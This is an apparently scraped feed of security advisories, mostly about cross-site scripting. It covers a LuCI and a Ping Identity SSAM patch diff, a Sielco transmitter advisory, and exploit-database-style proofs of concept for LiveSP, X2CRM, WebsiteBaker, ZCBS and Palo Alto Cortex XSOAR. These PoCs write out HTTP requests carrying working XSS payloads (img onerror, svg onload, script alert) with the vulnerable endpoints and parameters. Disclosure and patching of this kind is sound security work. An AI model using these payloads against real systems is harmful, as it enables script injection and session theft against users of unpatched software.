LuCI openwrt-22.03 branch git-22.361.69894-438c598 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component /system/sshkeys.js.

@@ -204,7 +204,7 @@ function removeKey(ev) {  
L.showModal(\_('Delete key'), \[ E('div', \_('Do you really want to delete the following SSH key?')), E('pre', delkey), E('pre', \[ delkey \]), E('div', { class: 'right' }, \[ E('div', { class: 'btn', click: L.hideModal }, \_('Cancel')), ' ',

CVE-2023-24182: luci-mod-system: fix potential stored XSS · openwrt/luci@0186d7e

Categories: News
Tags: TikTok

Tags:  Super FabriXss

Tags:  Twitter

Tags:  macOS malware

Tags:  ransomware

Tags:  2023 State of Malware

Tags:  Western Digital

Tags:  Android

Tags:  endpoint security

Tags:  ChatGPT

Tags:  K-12

Tags:  IoT

Tags:  Facebook

Tags:  targeted advertising

Tags:  Google

Tags:  data theft

Tags:  e-file

Tags:  tax

Tags:  Uber breach

The most interesting security related news from the week of April 3 - 9.



(Read more...)




The post A week in security (April 3 - 9) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (April 3 - 9)

Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions and manipulate the RDS text display.

Title: Sielco PolyEco Digital FM Transmitter 2.0.6 Radio Data System POST Manipulation  
Advisory ID: ZSL-2023-5767  
Type: Local/Remote  
Impact: Security Bypass, Cross-Site Scripting  
Risk: (4/5)  
Release Date: 10.04.2023

**Summary**

PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000).

All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more.

**Description**

Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions and manipulate the RDS text display.

**Vendor**

Sielco S.r.l - https://www.sielco.org

**Affected Version**

PolyEco1000 CPU:2.0.6 FPGA:10.19  
PolyEco1000 CPU:1.9.4 FPGA:10.19  
PolyEco1000 CPU:1.9.3 FPGA:10.19  
PolyEco500 CPU:1.7.0 FPGA:10.16  
PolyEco300 CPU:2.0.2 FPGA:10.19  
PolyEco300 CPU:2.0.0 FPGA:10.19

**Tested On**

lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

**Vendor Status**

\[26.01.2023\] Vulnerability discovered.  
\[27.01.2023\] Contact with the vendor and CSIRT Italia.  
\[09.04.2023\] No response from the vendor.  
\[09.04.2023\] No response from the CSIRT team.  
\[10.04.2023\] Public security advisory released.

**PoC**

sielco\_polyeco\_rds.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[10.04.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Sielco PolyEco Digital FM Transmitter 2.0.6 Radio Data System POST Manipulation

A cross-site scripting (XSS) vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary web scripts or HTML.

**CVE-2023-24721 - Stored Cross-site Scripting (XSS)**

  

**Description**

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

**POC**

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

**Affected Endpoint**

*   **URL:** https://\[ip:port\]/va/service/bach/topology/element
*   **HTTP Post Parameter:** name

**Technical Details**

In this specific instance, using the API available under _/va/service/bach/topology/element_, it is possible to inject arbitrary JavaScript code within the _name_ POST parameter, as shown in the following HTTP Request/Response pair.

**HTTP Request:**

POST /va/service/bach/topology/element HTTP/1.1
Host: \[REDACTED\]
Cookie: \[REDACTED\]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: \[REDACTED\]
X-Customer: \[REDACTED\]
Content-Type: application/json
Content-Length: 175
Origin: \[REDACTED\]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\\"\><img src\='x' onerror\='alert(\\"pwned\\")'\>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":\[\]}}

**HTTP Response:**

HTTP/1.1 201 Created
Server: \[REDACTED\]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers:Accept,Accept-Language,APP-Platform,APP-Version,Content-Disposition,Content-Language,Content-Range,Content-Type,X-Customer,X-Debug,X-MT-Admin,X-UserScope,X-UserToken
Access-Control-Allow-Origin: \*
Referrer-Policy: strict-origin

\[...\]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the _https://\[hostname:port\]/va/cluster_ web page, the exploit runs from the victim’s browser.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24721

CVE-2023-24721: CVE/CVE-2023-24721.md at main · marcovntr/CVE

A vulnerability, which was classified as problematic, has been found in Ping Identity Self-Service Account Manager 1.1.2. Affected by this issue is some unknown functionality of the file src/main/java/com/unboundid/webapp/ssam/SSAMController.java. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.1.3 is able to address this issue. The name of the patch is f64b10d63bb19ca2228b0c2d561a1a6e5a3bf251. It is recommended to upgrade the affected component. VDB-225362 is the identifier assigned to this vulnerability.

@@ -0,0 +1,44 @@

/\*

\* Copyright 2014-2017 Ping Identity Corporation

\* All Rights Reserved.

\*/

  

package com.unboundid.webapp.ssam;

  

import org.springframework.stereotype.Component;

import javax.servlet.FilterConfig;

import javax.servlet.ServletRequest;

import javax.servlet.ServletResponse;

import javax.servlet.FilterChain;

import javax.servlet.http.HttpServletResponse;

  

@Component

public class HTTPHeaderFilter implements javax.servlet.Filter {

public FilterConfig filterConfig;

  

public void doFilter(final ServletRequest request,

final ServletResponse response, FilterChain chain)

throws java.io.IOException, javax.servlet.ServletException {

  

HttpServletResponse res = (HttpServletResponse) response;

  

// Set this variable to the sha256 pin of your public key

// This value can be generated using the "openssl" command line tool

// https://developer.mozilla.org/en-US/docs/Web/HTTP/Public\_Key\_Pinning

String pinSha256 = "";

  

if(pinSha256.length() > 0)

{

res.setHeader("Public-Key-Pins", "max-age=518400; " +

"pin-sha256=\\"" + pinSha256 + "\\"; " +

"includeSubDomains");

}

  

chain.doFilter(request, response);

}

  

public void init(final FilterConfig filterConfig) { this.filterConfig = filterConfig; }

  

public void destroy() {}

  

}

@@ -0,0 +1,35 @@

/\*

\* Copyright 2014-2017 Ping Identity Corporation

\* All Rights Reserved.

\*/

  

package com.unboundid.webapp.ssam;

  

import org.springframework.stereotype.Component;

import javax.servlet.FilterConfig;

import javax.servlet.ServletRequest;

import javax.servlet.ServletResponse;

import javax.servlet.FilterChain;

import javax.servlet.http.HttpServletRequest;

  

@Component

public class HTTPRequestParameterFilter implements javax.servlet.Filter {

public FilterConfig filterConfig;

  

public void doFilter(final ServletRequest request,

final ServletResponse response, FilterChain chain)

throws java.io.IOException, javax.servlet.ServletException {

  

String curMethod = ((HttpServletRequest) request).getMethod();

//only allow for GET and POST requests.

if (curMethod.equalsIgnoreCase("get") || curMethod.equalsIgnoreCase("post"))

{

chain.doFilter(request, response);

}

}

  

public void init(final FilterConfig filterConfig) {

this.filterConfig = filterConfig;

}

public void destroy() {}

}

@@ -44,6 +44,7 @@

import org.springframework.web.bind.annotation.RequestParam;

import org.springframework.web.bind.annotation.ResponseBody;

import org.springframework.web.client.RestTemplate;

import org.springframework.web.util.HtmlUtils;

  

import com.fasterxml.jackson.annotation.JsonIgnoreProperties;

import com.fasterxml.jackson.annotation.JsonProperty;

@@ -971,7 +972,7 @@ private void populateUserModel(String username, Entry entry, Model model)

model.addAttribute("username", username);

for(Attribute attribute : entry.getAttributes())

{

model.addAttribute(attribute.getName(), attribute.getValue());

model.addAttribute(attribute.getName(), HtmlUtils.htmlEscape(attribute.getValue()));

}

model.addAttribute("entry", entry);

}

@@ -989,7 +990,7 @@ private void populateRegistrationModel(Map<String, String> parameters,

String value = parameter.getValue().trim();

if(!value.isEmpty())

{

model.addAttribute(name, value);

model.addAttribute(name, HtmlUtils.htmlEscape(value));

}

}

}

@@ -1,3 +1,12 @@

/\*

\* None style added to help with Frame Busting

\* intended for older browsers without 'X-Frame-Options' header support.

\* This method comes from an OWASP write up by Gustav Rydstedt.

\*/

html {

display: none;

}

  

.navbar-static-top {

margin-bottom: 19px;

}

@@ -0,0 +1,26 @@

// frame busting

function buster(document\_in, top\_in) {

if (self \=== top\_in) {

document\_in.documentElement.style.display \= "block";

} else {

top\_in.location \= self.location;

}

}

  

// html escaping for potentially unsafe jQuery methods such as ".append()"

var entityMap \= {

'&': '&amp;',

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

"'": '&#x27;',

'/': '&#x2F;',

'\`': '&#x60;',

'=': '&#x3D;'

};

  

function escapeHtml (string) {

return String(string).replace(/\[&<>"'\`=\\/\]/g, function (s) {

return entityMap\[s\];

});

}

@@ -25,7 +25,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -13,5 +13,9 @@

<div class="container">

Something went wrong: $!status $error

</div>

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

</body>

</html>

@@ -22,7 +22,7 @@

<label for="inputUsername" class="sr-only">Email/Username</label>

<input type="text" id="inputUsername" name="username" class="form-control" placeholder="Email/Username" required autofocus>

<label for="inputPassword" class="sr-only">Password</label>

<input type="password" id="inputPassword" name="password" class="form-control" placeholder="Password" required>

<input type="password" id="inputPassword" name="password" class="form-control" placeholder="Password" autocomplete="off" required>

<button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>

<div style="margin-top: 5px;">

<a href="recoverPassword">Forgot password?</a>

@@ -31,6 +31,10 @@

</div>

</form>

</div>

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

</body>

@@ -25,7 +25,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script type="text/javascript">

$(document).ready(function() {

@@ -90,6 +90,10 @@

</div>

</div>

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -51,6 +51,10 @@

</div>

</div>

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -93,6 +93,10 @@

</div>

</div>

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -25,7 +25,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -56,7 +56,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -113,20 +113,20 @@

<div class="form-group">

<label class="col-sm-4 control-label">Current Password </label>

<div class="col-sm-8">

<input id="currentPassword" type="password" class="form-control" placeholder="Enter Current Password">

<input id="currentPassword" type="password" class="form-control" placeholder="Enter Current Password" autocomplete="off"\>

</div>

</div>

<div class="form-group">

<label class="col-sm-4 control-label">Password </label>

<div class="col-sm-8">

<input id="password" type="password" class="form-control" placeholder="Enter New Password">

<input id="password" type="password" class="form-control" placeholder="Enter New Password" autocomplete="off"\>

#parse("\_password-requirements.vm")

</div>

</div>

<div class="form-group">

<label class="col-sm-4 control-label">Confirm&nbsp;Password </label>

<div class="col-sm-8">

<input id="confirmPassword" type="password" class="form-control" placeholder="Re-Enter New Password">

<input id="confirmPassword" type="password" class="form-control" placeholder="Re-Enter New Password" autocomplete="off"\>

</div>

</div>

</form>

@@ -161,6 +161,10 @@

</div>

</div>

#end

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -277,8 +281,8 @@

cn = first + " " + last;

}

var address = cn + '$' + $('input\[name="street"\]').val().trim() + '$' + $('input\[name="l"\]').val().trim() + ', ' + $('input\[name="st"\]').val().trim() + ' ' + $('input\[name="postalCode"\]').val().trim();

userForm.append('<input type="hidden" name="cn" value="' + cn + '">');

userForm.append('<input type="hidden" name="postalAddress" value="' + address + '">');

userForm.append('<input type="hidden" name="cn" value="' + escapeHtml(cn) + '">');

userForm.append('<input type="hidden" name="postalAddress" value="' + escapeHtml(address) + '">');

userForm.submit();

});

});

CVE-2018-25084: Added html escaping to help with XSS. Added frame busting to help wit… · pingidentity/ssam@f64b10d

X2CRM versions 6.6 and 6.9 suffer from multiple cross site scripting vulnerabilities.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

X2CRM 6.6 / 6.9 Cross Site Scripting

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

WebsiteBaker 2.13.3 Cross Site Scripting

ZCBS, ZBBS, and ZPBS version 4.14k suffer from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)# Date: 2023-03-30# CVE: CVE-2023-26692# Exploit Author: Abdulaziz Saad (@b4zb0z)# Vendor Homepage: https://www.zcbs.nl# Version: 4.14k# Tested on: LAMP, Ubuntu# Google Dork: inurl:objecten.pl?ident=3D---[#] Vulnerability :`$_GET['ident']`[#] Exploitation :`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror==3Dalert(%22XSS%22)%3E`

ZCBS / ZBBS / ZPBS 4.14k Cross Site Scripting

Palo Alto Cortex XSOAR version 6.5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)# Exploit Author: omurugur# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020# Version: 6.5.0 - 6.2.0 - 6.1.0# Tested on: [relevant os]# CVE : CVE-2022-0020# Author Web: https://www.justsecnow.com# Author Social: @omurugurrrA stored cross-site scripting (XSS) vulnerability in Palo Alto NetworkCortex XSOAR web interface enables an authenticated network-based attackerto store a persistent javascript payload that will perform arbitraryactions in the Cortex XSOAR web interface on behalf of authenticatedadministrators who encounter the payload during normal operations.POST /acc_UAB(MAY)/incidentfield HTTP/1.1Host: x.x.x.xCookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;isTimLicense=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)Gecko/20100101 Firefox/94.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://x.x.x.x/acc_UAB(MAY)Content-Type: application/jsonX-Xsrf-Token:Api_truncate_results: trueOrigin: https://x.x.x.xContent-Length: 373Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Fieldedited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}Regards,Omur UGUR

Palo Alto Cortex XSOAR 6.5.0 Cross Site Scripting

An issue was discovered in Progress Sitefinity 13.3 before 13.3.7647, 14.0 before 14.0.7736, 14.1 before 14.1.7826, 14.2 before 14.2.7930, and 14.3 before 14.3.8025. There is potential XSS by privileged users in Sitefinity to media libraries.

Loading

×Sorry to interrupt

CSS Error

Refresh

Tag

#xss